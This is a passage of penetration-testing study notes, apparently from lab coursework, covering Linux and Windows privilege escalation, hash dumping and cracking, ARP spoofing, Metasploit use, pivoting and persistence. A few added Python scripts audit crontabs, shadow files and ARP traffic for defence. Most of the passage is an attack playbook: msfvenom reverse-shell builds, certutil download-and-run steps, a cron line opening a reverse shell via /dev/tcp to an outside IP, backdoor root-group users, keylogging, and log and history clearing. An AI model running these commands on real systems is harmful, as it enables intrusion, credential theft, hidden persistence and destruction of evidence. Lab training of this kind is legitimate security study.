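    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in referenced_paths(command):
            for problem in check_path(path):
                findings.append((path, problem))
    return findings


def build_demo() -> str:
    """Constructed scenario: one sane script, one world-writable script, one missing script."""
    d = tempfile.mkdtemp(prefix="cron-audit-")
    for name, mode in (("backup.sh", 0o755), ("cleanup.sh", 0o777)):
        p = os.path.join(d, name)
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\necho ok\n")
        os.chmod(p, mode)
    return f"""SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *  * * *   root  {d}/backup.sh
*  *  * * *   root  sh {d}/cleanup.sh
@reboot       student {d}/cleanup.sh
30 2  * * *   root  {d}/missing.sh
"""


if __name__ == "__main__":
    for path, problem in audit_crontab(build_demo()):
        print(f"{path}: {problem}")
```

Run it against the real /etc/crontab and /etc/cron.d/* to find the writable-script case the notes exploit before someone else does.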

g. Exploitation of SUID binaries:

setuid: a bit that makes an executable run with the privileges of the owner of the file

If we find two binary files, <first_file> with the SUID permission ('ls -l') and <second_file> owned by
root, and <second_file> is executed whenever we execute <first_file> (check with strings):
strings <first_file>
then we can remove <second_file>, create a new file with the same name containing /bin/bash,
and execute <first_file>:
rm <second_file>
cp /bin/bash <second_file>
./<first_file>


h. Dump hashes:
All the information for all accounts on Linux is stored in the passwd file located in:
/etc/passwd
All the hashed passwords of the users are stored in the shadow file, found at: /etc/shadow
The hash type is given by the prefix of the hash field:
$1$ MD5
$2$ Blowfish (bcrypt)
$5$ SHA-256
$6$ SHA-512
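An added example, not from the original notes: a parser for /etc/shadow entries that identifies the hash algorithm from the $id$ prefix in the table above (it also recognises $y$, yescrypt, which newer distributions use by default) and flags accounts with an empty password field or a weak hash. The shadow lines are constructed, with dummy hash strings.

```python
import re

# crypt(3) prefixes: the table above, plus $y$ (yescrypt), the default on newer distributions.
HASH_TYPES = {
    "1": "MD5 (md5crypt)",
    "2": "bcrypt (Blowfish)",        # appears as $2a$, $2b$ or $2y$
    "5": "SHA-256 (sha256crypt)",
    "6": "SHA-512 (sha512crypt)",
    "y": "yescrypt",
}
WEAK_ALGORITHMS = {"MD5 (md5crypt)", "DES crypt"}
SHADOW_FIELDS = ("name", "hash", "lastchange", "min", "max", "warn", "inactive", "expire", "reserved")


def classify_hash(field: str):
    """Return (status, algorithm) for the password field of a shadow entry."""
    if field == "":
        return "empty", None                       # login possible without any password
    if field.startswith(("!", "*")):
        return "locked", None                      # locked account or no password set
    m = re.match(r"^\$([^$]+)\$", field)
    if not m:
        return "active", "DES crypt"               # 13-character traditional crypt, no $id$
    ident = m.group(1)
    key = "2" if ident.startswith("2") else ident
    return "active", HASH_TYPES.get(key, f"unknown ({ident})")


def parse_shadow_line(line: str) -> dict:
    """Split one shadow entry into its nine fields and classify the hash."""
    parts = line.rstrip("\n").split(":")
    if len(parts) != 9:
        raise ValueError(f"malformed shadow entry: {line!r}")
    entry = dict(zip(SHADOW_FIELDS, parts))
    entry["status"], entry["algorithm"] = classify_hash(entry["hash"])
    return entry


def audit_shadow(text: str) -> list:
    """(account, problem) for every entry that allows passwordless login or uses a weak hash."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        e = parse_shadow_line(line)
        if e["status"] == "empty":
            findings.append((e["name"], "empty password field"))
        elif e["status"] == "active" and e["algorithm"] in WEAK_ALGORITHMS:
            findings.append((e["name"], f"weak hash: {e['algorithm']}"))
    return findings


# Constructed sample; the hash bodies are placeholders, not real digests.
SHADOW_SAMPLE = """\
root:$6$Xyz12345$CONSTRUCTEDsha512HASHbody000000000000000000000000000000000000000000000:19400:0:99999:7:::
daemon:*:19400:0:99999:7:::
legacy:$1$abcdefgh$CONSTRUCTEDmd5HASHbody:18000:0:99999:7:::
student:$5$rounds=5000$saltsalt$CONSTRUCTEDsha256HASHbody00000000000000:19400:0:99999:7:::
guest::19400:0:99999:7:::
svc:!$6$qwerty12$CONSTRUCTEDlockedHASHbody00000000000000000000000000000000000:19400:0:99999:7:::
"""

if __name__ == "__main__":
    for line in SHADOW_SAMPLE.splitlines():
        e = parse_shadow_line(line)
        print(f"{e['name']:8} {e['status']:7} {e['algorithm']}")
    print(audit_shadow(SHADOW_SAMPLE))
```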

This nmap script helps us discover vulnerabilities, for example in FTP:

nmap --script vuln -p 21 <ip>

Before using Metasploit, start the PostgreSQL database service so that msfconsole works
without problems:
/etc/init.d/postgresql start
After finding the exploit in Metasploit and exploiting the target,
we can use another module in msf to obtain the hashes:
use post/linux/gather/hashdump
set SESSION 1
and another module to crack them:
use auxiliary/analyze/crack_linux
set SHA512 true
run


6. Network Based Attacks:


a. DNS:
What is DNS:
DNS (Domain Name System) provides a simple way for us to communicate with devices on the
internet without remembering complex numbers. Much like every house has a unique address for
sending mail directly to it, every computer on the internet has its own unique address to
communicate with it, called an IP address. An IP address looks like the following: 104.26.10.229,
4 sets of digits ranging from 0 to 255 separated by a period. When you want to visit a website, it's
not exactly convenient to remember this complicated set of numbers, and that's where DNS can
help.

DNS Record Types :


DNS isn't just for websites though, and multiple types of DNS record exist. We'll go
over some of the most common ones that you're likely to come across.

A Record :
These records resolve to IPv4 addresses, for example 104.26.10.229
AAAA Record :
These records resolve to IPv6 addresses, for example 2606:4700:20::681a:be5
CNAME Record:
These records resolve to another domain name, for example, TryHackMe's online
shop has the subdomain name store.tryhackme.com which returns a CNAME
record shops.shopify.com. Another DNS request would then be made to
shops.shopify.com to work out the IP address.
MX Record:
These records resolve to the address of the servers that handle the email for the
domain you are querying, for example an MX record response for tryhackme.com
would look something like alt1.aspmx.l.google.com. These records also come
with a priority flag. This tells the client in which order to try the servers, this is
perfect for if the main server goes down and email needs to be sent to a backup
server.
TXT Record
TXT records are free text fields where any text-based data can be stored. TXT
records have multiple uses, but some common ones can be to list servers that
have the authority to send an email on behalf of the domain (this can help in the
battle against spam and spoofed email). They can also be used to verify
ownership of the domain name when signing up for third party services.

What happens when you make a DNS request


1. When you request a domain name, your computer first checks its local cache
to see if you've previously looked up the address recently; if not, a request to
your Recursive DNS Server will be made.
2. A Recursive DNS Server is usually provided by your ISP, but you can also
choose your own. This server also has a local cache of recently looked up
domain names. If a result is found locally, this is sent back to your computer,
and your request ends here (this is common for popular and heavily
requested services such as Google, Facebook, Twitter). If the request cannot
be found locally, a journey begins to find the correct answer, starting with the
internet's root DNS servers.
3. The root servers act as the DNS backbone of the internet; their job is to
redirect you to the correct Top Level Domain Server, depending on your
request. If, for example, you request www.tryhackme.com, the root server will
recognise the Top Level Domain of .com and refer you to the correct TLD
server that deals with .com addresses.
4. The TLD server holds records for where to find the authoritative server to
answer the DNS request. The authoritative server is often also known as the
nameserver for the domain. For example, the name server
for tryhackme.com is kip.ns.cloudflare.com and uma.ns.cloudflare.com. You'll
often find multiple nameservers for a domain name to act as a backup in case
one goes down.
5. An authoritative DNS server is the server that is responsible for storing the
DNS records for a particular domain name and where any updates to your
domain name DNS records would be made. Depending on the record type,
the DNS record is then sent back to the Recursive DNS Server, where a local
copy will be cached for future requests and then relayed back to the original
client that made the request. DNS records all come with a TTL (Time To Live)
value. This value is a number represented in seconds that the response
should be saved for locally until you have to look it up again. Caching saves
on having to make a DNS request every time you communicate with a server.

We can use nslookup to get the IP address of a domain.
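An added example, not from the original notes: the record types and the resolver answer described above, in code. It builds a constructed DNS response for tryhackme.com carrying A, AAAA, CNAME, MX and TXT answers (the values quoted in the text) and parses it back, including the label compression pointers real answers use; this is the parsing step nslookup performs on the bytes it receives.

```python
import socket
import struct

RECORD_TYPES = {1: "A", 5: "CNAME", 15: "MX", 16: "TXT", 28: "AAAA", 255: "ANY"}


def encode_name(name: str) -> bytes:
    """Wire format: length-prefixed labels ending in a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def parse_name(msg: bytes, off: int):
    """Read a possibly compressed name; return (name, offset just after it in the stream)."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                       # 2-byte pointer to an earlier name
            if end is None:
                end = off + 2                           # the stream resumes after the first pointer
            off = ((length & 0x3F) << 8) | msg[off + 1]
            hops += 1
            if hops > 16:                               # a pointer loop would hang a naive parser
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if end is not None else off)


def parse_rdata(msg: bytes, rtype: int, off: int, rdlen: int):
    """Decode the record data for the types covered in the text."""
    data = msg[off:off + rdlen]
    if rtype == 1:
        return socket.inet_ntoa(data)
    if rtype == 28:
        return socket.inet_ntop(socket.AF_INET6, data)
    if rtype == 5:
        return parse_name(msg, off)[0]
    if rtype == 15:                                     # preference, then exchanger name
        return struct.unpack("!H", data[:2])[0], parse_name(msg, off + 2)[0]
    if rtype == 16:                                     # one or more length-prefixed strings
        strings, i = [], 0
        while i < rdlen:
            n = data[i]
            strings.append(data[i + 1:i + 1 + n].decode("ascii"))
            i += 1 + n
        return strings
    return data.hex()


def parse_message(msg: bytes) -> dict:
    """Header, question section and answer section of a DNS message."""
    ident, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    off, questions, answers = 12, [], []
    for _ in range(qdcount):
        name, off = parse_name(msg, off)
        qtype, _ = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        questions.append((name, RECORD_TYPES.get(qtype, qtype)))
    for _ in range(ancount):
        name, off = parse_name(msg, off)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        answers.append((name, RECORD_TYPES.get(rtype, rtype), ttl, parse_rdata(msg, rtype, off, rdlen)))
        off += rdlen
    return {"id": ident, "is_response": bool(flags & 0x8000), "rcode": flags & 0xF,
            "questions": questions, "answers": answers}


def _rr(owner: bytes, rtype: int, ttl: int, rdata: bytes) -> bytes:
    return owner + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata


def build_sample_response() -> bytes:
    """Constructed reply carrying the record types from the section above (values as in the text)."""
    header = struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 5, 0, 0)   # response, RD+RA, 1 question, 5 answers
    question = encode_name("tryhackme.com") + struct.pack("!HH", 255, 1)
    ptr = b"\xc0\x0c"                                   # pointer to offset 12, where the question name sits
    spf = b"v=spf1 include:_spf.google.com ~all"
    answers = (
        _rr(ptr, 1, 300, socket.inet_aton("104.26.10.229"))
        + _rr(ptr, 28, 300, socket.inet_pton(socket.AF_INET6, "2606:4700:20::681a:be5"))
        + _rr(b"\x05store" + ptr, 5, 300, encode_name("shops.shopify.com"))
        + _rr(ptr, 15, 300, struct.pack("!H", 10) + encode_name("alt1.aspmx.l.google.com"))
        + _rr(ptr, 16, 300, bytes([len(spf)]) + spf)
    )
    return header + question + answers


if __name__ == "__main__":
    for record in parse_message(build_sample_response())["answers"]:
        print(record)
```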


b. wireshark:

c. ARP poisoning :
What is ARP Spoofing (ARP Poisoning)
ARP spoofing, also known as ARP poisoning, is a Man in the Middle (MitM) attack that allows
attackers to intercept communication between network devices. The attack works as follows:


1. The attacker must have access to the network. They scan the network to determine the IP
addresses of at least two devices, let's say these are a workstation and a router.
2. The attacker uses a spoofing tool, such as Arpspoof or Driftnet, to send out forged ARP
responses.
3. The forged responses advertise that the correct MAC address for both IP addresses,
belonging to the router and workstation, is the attacker’s MAC address. This fools both
router and workstation to connect to the attacker’s machine, instead of to each other.
4. The two devices update their ARP cache entries and from that point onwards, communicate
with the attacker instead of directly with each other.
5. The attacker is now secretly in the middle of all communications.

Dsniff tools:
dsniff is a collection of tools for network auditing and penetration testing. Enable IP forwarding, then:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i <interface> -t <target> -r <host>
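An added detection example, not from the original notes: the attack above leaves two traces in ARP traffic, an IP whose MAC binding suddenly changes and one MAC answering for several IPs. This Python monitor reads tcpdump-style ARP reply lines (the capture below is constructed) and reports both.

```python
import re
from collections import defaultdict

# Matches tcpdump's rendering of an ARP reply, e.g. from: tcpdump -i eth0 -n arp
ARP_REPLY = re.compile(
    r"ARP, Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at (?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})"
)


class ArpMonitor:
    """Tracks IP->MAC bindings seen in ARP replies and raises the two signs of poisoning
    described above: a binding that flips to another MAC, and one MAC answering for several IPs."""

    def __init__(self):
        self.ip_to_mac = {}
        self.mac_to_ips = defaultdict(set)
        self._reported = set()
        self.alerts = []

    def observe(self, line: str):
        m = ARP_REPLY.search(line)
        if not m:
            return
        ip, mac = m.group("ip"), m.group("mac").lower()
        previous = self.ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            # Legitimate causes exist (NIC swap, DHCP address reuse), so treat this as a lead, not proof.
            self.alerts.append(("mac-change", ip, previous, mac))
        self.ip_to_mac[ip] = mac
        self.mac_to_ips[mac].add(ip)
        claimed = tuple(sorted(self.mac_to_ips[mac]))
        # A router with several addresses on one interface also triggers this; whitelist known ones.
        if len(claimed) > 1 and (mac, claimed) not in self._reported:
            self._reported.add((mac, claimed))
            self.alerts.append(("multi-ip", mac, claimed))

    def scan(self, capture_text: str) -> list:
        for line in capture_text.splitlines():
            self.observe(line)
        return self.alerts


# Constructed capture: the gateway (.1) and a workstation (.20) answer normally, then a third MAC
# starts answering for both, which is exactly the situation in step 3 above.
SAMPLE_CAPTURE = """\
12:00:01.000100 ARP, Reply 10.10.10.1 is-at 00:11:22:33:44:01, length 28
12:00:01.000200 ARP, Reply 10.10.10.20 is-at 00:11:22:33:44:20, length 28
12:00:05.100000 ARP, Reply 10.10.10.1 is-at de:ad:be:ef:00:99, length 28
12:00:05.100100 ARP, Reply 10.10.10.20 is-at de:ad:be:ef:00:99, length 28
12:00:07.000000 ARP, Reply 10.10.10.1 is-at de:ad:be:ef:00:99, length 28
"""

if __name__ == "__main__":
    for alert in ArpMonitor().scan(SAMPLE_CAPTURE):
        print(alert)
```

Static ARP entries for the gateway and dynamic ARP inspection on the switch remove the condition this monitor detects.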

d. tshark :
Tshark is a command-line tool created by the Wireshark team that shares the same powerful
parsing engine as Wireshark.
Which version of Tshark is installed in the lab?
tshark -v
What is the Tshark command to sniff on eth0
tshark -i eth0
How can you read this file in Tshark and display the packet list on the console?
tshark -r HTTP_traffic.pcap
How can you find the total number of packets in HTTP_traffic.pcap:
tshark -r HTTP_traffic.pcap | wc -l
Tshark command to read the first 100 packets only from HTTP_traffic.pcap
tshark -r HTTP_traffic.pcap -c 100
Print the list of protocols in HTTP_traffic.pcap
tshark -r HTTP_traffic.pcap -z io,phs -q
Command to show only the HTTP traffic from a PCAP file?
tshark -Y 'http' -r HTTP_traffic.pcap
Command to show only the IP packets sent from IP address 192.168.252.128 to IP address 52.32.74.91?
tshark -r HTTP_traffic.pcap -Y "ip.src==192.168.252.128 && ip.dst==52.32.74.91"
Command to print only packets containing GET requests?
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET"


Command to print only the timestamp, source IP and URL for all GET request packets?
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET" -Tfields -e frame.time -e ip.src -e http.request.full_uri
How many HTTP packets contain the "password" string?
tshark -r HTTP_traffic.pcap -Y "http contains password"
What is the destination IP address for GET requests sent for New York Times (www.nytimes.com)?
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET && http.host==www.nytimes.com" -Tfields -e ip.dst
What is the session ID being used by 192.168.252.128 for Amazon India store (amazon.in)?
tshark -r HTTP_traffic.pcap -Y "ip contains amazon.in && ip.src==192.168.252.128" -Tfields -e ip.src -e http.cookie
What type of OS is the machine at IP address 192.168.252.128 using (i.e.
Windows/Linux/MacOS/Solaris/Unix/BSD)?
tshark -r HTTP_traffic.pcap -Y "ip.src==192.168.252.128 && http" -Tfields -e http.user_agent


7. metasploit:
Metasploit is the most widely used exploitation framework. Metasploit is a powerful tool that
can support all phases of a penetration testing engagement, from information gathering to
post-exploitation.

Metasploit has two main versions:


 Metasploit Pro: The commercial version that facilitates the automation and
management of tasks. This version has a graphical user interface (GUI).
 Metasploit Framework: The open-source version that works from the command line.
This room will focus on this version, installed on the AttackBox and most commonly
used penetration testing Linux distributions.

The Metasploit Framework is a set of tools that allow information gathering, scanning,
exploitation, exploit development, post-exploitation, and more. While the primary usage of
the Metasploit Framework focuses on the penetration testing domain, it is also useful for
vulnerability research and exploit development.

The main components of the Metasploit Framework can be summarized as follows:


 msfconsole: The main command-line interface.
 Modules: supporting modules such as exploits, scanners, payloads, etc.
 Tools: Stand-alone tools that will help vulnerability research, vulnerability assessment,
or penetration testing. Some of these tools are msfvenom, pattern_create and
pattern_offset. We will cover msfvenom within this module, but pattern_create and
pattern_offset are tools useful in exploit development which is beyond the scope of
this module.

These commands are used to set up msfconsole:

sudo apt-get update && sudo apt-get install metasploit-framework -y
sudo systemctl enable postgresql
sudo systemctl status postgresql
sudo msfdb init
msfconsole
db_status


search cve:<year> type:<module> platform:<system>
search <vulnerability>
connect -h
workspace -h
To save the results of an nmap scan, use the option: -oX <name_file_xml>
To import the XML file into msf, use this command in msfconsole:
db_import <path_of_file>
We can list the open services found by msf with the command: services
We can also use db_nmap in a new workspace in msfconsole

a. pivoting:
After obtaining a meterpreter session on the first target, look for private IPs to discover
other targets in the same network as target 1:
shell
ifconfig (or ipconfig if the target is Windows)
ctrl + c
run autoroute -s <ip>
background
search portscan
use 5
set RHOSTS <ip>

b. apache:
1. auxiliary/scanner/http/http_version
2. auxiliary/scanner/http/http_header
3. auxiliary/scanner/http/robots_txt
4. auxiliary/scanner/http/brute_dirs
5. auxiliary/scanner/http/dir_scanner
6. auxiliary/scanner/http/dir_listing
7. auxiliary/scanner/http/files_dir
8. auxiliary/scanner/http/http_put
set PATH /data
set FILENAME test.txt
set FILEDATA "Welcome To AttackDefense"
run
====
set PATH /data
set FILENAME test.txt
set ACTION DELETE
run
9. auxiliary/scanner/http/http_login
set AUTH_URI /secure/
set VERBOSE false
run
10. auxiliary/scanner/http/apache_userdir_enum

c. mysql:
In this challenge we are going to look into the following MySQL auxiliary modules which can be useful
for MySQL enumeration and Penetration testing.
1. auxiliary/scanner/mysql/mysql_version
2. auxiliary/scanner/mysql/mysql_login
3. auxiliary/admin/mysql/mysql_enum
4. auxiliary/admin/mysql/mysql_sql
5. auxiliary/scanner/mysql/mysql_file_enum
6. auxiliary/scanner/mysql/mysql_hashdump
7. auxiliary/scanner/mysql/mysql_schemadump
8. auxiliary/scanner/mysql/mysql_writable_dirs


d. smtp:
What is the SMTP server name and banner:
nmap -sV --script banner <ip>
Connect to SMTP service using netcat and retrieve the hostname of the server (domain name):
nc <ip> 25
Does user “admin” exist on the server machine? Connect to SMTP service using netcat and check
manually.
VRFY admin@openmailbox.xyz
Does user “commander” exist on the server machine? Connect to SMTP service using netcat and check
manually.
VRFY commander@openmailbox.xyz
What commands can be used to check the supported commands/capabilities? Connect to SMTP service
using telnet and check.
telnet <ip> 25
HELO attacker.xyz
EHLO attacker.xyz
How many of the common usernames present in the dictionary
/usr/share/commix/src/txt/usernames.txt exist on the server. Use smtp-user-enum tool for this task.
smtp-user-enum -U /usr/share/commix/src/txt/usernames.txt -t <ip>
How many common usernames present in the dictionary /usr/share/metasploit-
framework/data/wordlists/unix_users.txt exist on the server. Use suitable metasploit module for this
task.
use auxiliary/scanner/smtp/smtp_enum
Connect to SMTP service using telnet and send a fake mail to root user.
telnet <ip> 25
HELO attacker.xyz
mail from: admin@attacker.xyz
rcpt to:root@openmailbox.xyz
data
Subject: Hi Root

Hello,
This is a fake mail sent using the telnet command.
From,
Admin
.
Send a fake mail to root user using sendemail command.


sendemail -f admin@attacker.xyz -t root@openmailbox.xyz -s <ip> -u Fakemail -m "Hi root, a fake from admin" -o tls=no
The Haraka SMTP server version 2.8.9 is vulnerable to command injection:
use exploit/linux/smtp/haraka
set SRVPORT 9898
set email_to root@attackdefense.test
set payload linux/x64/meterpreter_reverse_http


e. WMAP:
WMAP is a plugin in msfconsole that helps automate enumeration and vulnerability assessment in
Metasploit, like Nessus.
After running msf, use this command to load wmap:
load wmap
WMAP has these commands; we focus on modules, run, sites, targets and vulns:
wmap_modules wmap_nodes wmap_run wmap_sites wmap_targets wmap_vulns
First, add the target site:
wmap_sites -a <ip>
wmap_targets -t http://<ip>
View the available sites:
wmap_sites -l
Begin the web app vulnerability scan (this first lists the modules that will run):
wmap_run -t
After viewing the available scan modules, run them all automatically:
wmap_run -e

f. msfvenom:
msfvenom -a <architecture> -p <payload> LHOST=<ip> -f <format> -e <encoder>
Linux Executable and Linkable Format (elf):
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
python3 -m http.server 9000
chmod +x rev_shell.elf
Steps:
1- generate the payload with msfvenom
2- run an HTTP server with python3: sudo python3 -m http.server <port>
3- use the multi handler module in msfconsole
4- fetch http://<ip>:<port> (IP of the attack machine) from the target machine and run the payload

g. Automating Metasploit:
Metasploit's resource scripts live in /usr/share/metasploit-framework/scripts/resource; that
location holds a number of ready-made scripts, but we can also create a new script file with vim,
writing the same steps we would follow in msfconsole, and save it with the .rc extension. It can then
be used with: msfconsole -r <file>
or, from inside msfconsole, with the command: resource <path_of_file>
We can also create the script while using msfconsole with makerc <path_file>; the script is
created automatically from the commands entered so far in msfconsole.


h. Apache Tomcat:
Apache Tomcat is a web server developed in Java; it typically runs on port 8080 using the HTTP
protocol. Version 8.5.19 is vulnerable to RCE.
To exploit that vulnerability in msf, use this module:
use exploit/multi/http/tomcat_jsp_upload_bypass
To get a meterpreter shell, generate a payload with msfvenom, run a simple HTTP server with
python and type this command in the JSP shell on the target session:
certutil -urlcache -f http://<ip>/file file
After that, run the multi handler in msfconsole, configure it, and execute the payload on the
target: ./file

i. FTP:
vsFTPd is an FTP server for Unix and Linux; version 2.3.4 is vulnerable (backdoor):
exploit/unix/ftp/vsftpd_234_backdoor

j. meterpreter:
 sysinfo
 getuid
 checksum
 getenv path
 getenv term
 ps
 migrate <id>
 migrate -N <name>
 sessions -u 1


k. windows post exploitation :


If we exploit Windows with admin privileges, we can use getsystem to get SYSTEM privileges:
 hashdump
 show_mount
 search migrate
 search win_privs
 search enum_logged_on
 search checkvm
 search enum_application
 search enum_av
 search enum_computer
 search enum_patches
 search enum_shares
 search enable_rdp
bypass UAC:
To check the existing users in Windows, type shell then use the command:
net users
To check the actual local group in Windows: net localgroup administrators
search bypassuac_injection

impersonate:
load incognito
list_tokens -u
impersonate_token

psexec:
hashdump
search psexec
set smbuser
set smbpass

persistence:
search platform:windows persistence_service
set session 1
At any time we can use the multi handler to get back into the target

enable_rdp:
To add a user in Windows:
net user username password /add
net localgroup groupname username /add
search enable_rdp


set SESSION 1
Change the user's password: net user <user> <password>
xfreerdp /u:<user> /p:<password> /v:<ip>

keylogging:
keyscan_start ; keyscan_dump

clearing event logs:


clearev

pivoting:
run autoroute -s <ip_network>
portfwd add -l <port_attacker> -p <port_victim> -r <victim_2>


l. linux post exploitation :


 /bin/bash -i
 cat /etc/passwd
 groups root
 cat /etc/*issue
 uname -r
 netstat -antp
 ps aux
 env
 search enum_configs
 search env platform:linux
 search enum_network
 search enum_protections
 search enum_system
 search checkcontainer
 search enum_users_history
 use post/multi/gather/ssh_creds
 use post/multi/gather/docker_creds
 use post/linux/gather/ecryptfs_creds
 use post/linux/gather/enum_psk
 use post/linux/gather/enum_xchat
 use post/linux/gather/phpmyadmin_credsteal
 use post/linux/gather/pptpd_chap_secrets
 use post/linux/manage/sshkey_persistence
rootkit:
chkrootkit -v
search chkrootkit
set CHKROOTKIT /bin/chkrootkit

persistence:
Create a new user as a backdoor:
useradd -m <name> -s /bin/bash
Add the user to the root group:
usermod -aG root <user>
usermod -u <id> <user>
search platform:linux persistence

use post/linux/manage/sshkey_persistence
set CREATESSHFOLDER true
loot
chmod 0400 ssh_key
ssh -i ssh_key root@<ip>


8. exploitation:
a. banner grabbing:
ls -la /usr/share/nmap/scripts | grep banner
nc <ip> <port>

b. searchsploit:
First, update exploitdb: sudo apt-get update && sudo apt-get install exploitdb -y
and update searchsploit: searchsploit -u
To use searchsploit, first search for the version of the service; then, having found the id of the exploit
file, copy it with the -m argument and the id: searchsploit -m <id>, which prints the path of the file.
We can use -c (case-sensitive) or -t (title only) to narrow the search for vulnerable services, and -e
for an exact match on the vulnerable version.

c. using exploit manually :


After finding the script in searchsploit, copy the file with: searchsploit -m <id>, then read
the file and edit the important information such as IP and port; we may need to run a simple HTTP server,
copy the netcat binary over and start nc in Kali to use the exploit file.

If the code is in C, C++, C# etc. we need to compile it:

First install mingw-w64 and gcc: sudo apt-get install mingw-w64 gcc

i686-w64-mingw32-gcc <file>.c -o exploit.exe -lws2_32

We can use this command for compilation, or follow the steps in the documentation of the file, such as:

gcc -pthread <file>.c -o exploit -lcrypt

d. netcat :
nc -nlvp 1234

nc -nv <ip> 1234

nc -nlvp 1234 > file

nc -nv <ip> 1234 < file

certutil -urlcache -f http://<ip>/nc.exe nc.exe

This is a cheat sheet for reverse shells: Reverse Shell Cheat Sheet - Payloads All The Things (swisskyrepo.github.io)

Online - Reverse Shell Generator (revshells.com)


e. black box exploitation:


 nmap -PA -sCV -p- <ip> -oX scan
 db_import <path of xml file >
 ls -la /usr/share/nmap/scripts/ | grep <service>

For FTP we can follow these steps:

 enumeration
 brute force
 log in to the FTP server
 generate a payload with msfvenom, upload the payload, set up the handler.

For SSH we can follow these steps:

 enumeration

 brute force

 ssh_login

For MySQL:

 enum
 brute force
 mysql -u <user> -p <password> -h <host>
 show databases;
 use <database> ;
 show tables;
 select * from <table>;
 UPDATE wp_users SET user_pass = MD5('password123') WHERE user_login = 'admin';
 http://<TARGET-IP>:8585/wordpress/wp-admin


9. Post exploitation:
1. Windows Local Enumeration:
The most common commands:

 getuid
 sysinfo
 hostname
 systeminfo
 wmic qfe get Caption,Description,HotFixID,InstalledON
 getprivs

for enum users and groups:

 search logged_on
 whoami /priv
 query user
 net users
 net user administrator
 net localgroup

for enum network information

 ipconfig /all
 route print
 arp -a
 netstat -ano
 netsh firewall show state
 netsh advfirewall show allprofiles

for enum process and services :

 ps
 net start
 wmic service list brief
 tasklist /SVC
 schtasks /query /fo LIST

To automate the local enumeration:

GitHub - 411Hall/JAWS: JAWS - Just Another Windows (Enum) Script

Copy the script, paste it into notepad and save it with the .ps1 extension, go to the tmp directory (or create it),
upload the script there and run it: powershell -ExecutionPolicy bypass -File ./<file>.ps1 -OutputFile <file>.txt


2. linux Local Enumeration:


The most common commands:

 /bin/bash -i
 hostname
 cat /etc/issue
 cat /etc/*release
 uname -a
 uname -r
 env
 lscpu
 free -h
 df -h
 dpkg -l

for enum users and groups:

 groups
 cat /etc/passwd
 useradd bob -s /bin/bash
 useradd -m bob -s /bin/bash
 usermod -aG root bob
 lastlog

for enum network information:

 ifconfig
 netstat
 route
 cat /etc/network/interfaces
 ip a s
 cat /etc/hostname
 cat /etc/resolv.conf
 arp -a

for enum process and cron jobs :

 ps
 pgrep <service>
 ps aux
 top
 crontab -l
 ls -a /etc/cron*

To automate the local enumeration:

 search enum_config
 search enum_network


 search enum_system
 search checkvm

LinEnum/LinEnum.sh at master · rebootuser/LinEnum · GitHub

Copy the script, paste it into a text editor and save it with the .sh extension, then go to the tmp directory (or create it).

3. Transferring Files To Windows & Linux Targets:


 python -m SimpleHTTPServer 80
 python3 -m http.server 80
 certutil -urlcache -f http://<ip> <output>
 wget http://<ip>

To get an interactive bash shell we can use python: python -c 'import pty; pty.spawn("/bin/bash")'

If perl is installed: perl -e 'exec "/bin/bash";'

With ruby: ruby -e 'exec "/bin/bash"'


4. Windows Privilege Escalation:


GitHub - itm4n/PrivescCheck: Privilege Escalation Enumeration Script for Windows

Command: powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

use exploit/windows/misc/hta_server

5. Linux Privilege Escalation:


find / -not -type l -perm -o+w

openssl passwd -1 -salt abc password

6. Windows Persistence:
 search persistence
 run getgui -e -u <user> -p <password>

7. Linux Persistence:
 scp student@<ip>:~/.ssh/id_rsa .
 chmod 400 id_rsa

Check the running processes: ps -eaf

 echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.160.120.2/1234 0>&1'" > cron
 echo "* * * * * cd /home/student/ && python -m SimpleHTTPServer" > cron
 crontab cron
 crontab -l

8. Dumping & Cracking Windows Hashes:


 hashdump

To crack the hashes, use john or hashcat to recover the passwords:

 john --format=NT <file> --wordlist=rockyou.txt
 hashcat -a 0 -m 1000 <file> <wordlist>

9. Dumping & Cracking Linux Hashes:


 search hashdump
 john --format=sha512crypt <file> --wordlist=rockyou.txt
 hashcat -a 0 -m 1800 <file> <wordlist>

10. Pivoting:
 run autoroute -s <ip/subnet>
 run autoroute -p
 search portscan
 portfwd add -l 1234 -p 80 -r <ip2>
 nmap -sV -p 1234 localhost

11. Clearing tracks:


 resource <script> ; clear


 history -c

10. Web exploitation:


 nc -v <domain> <port>
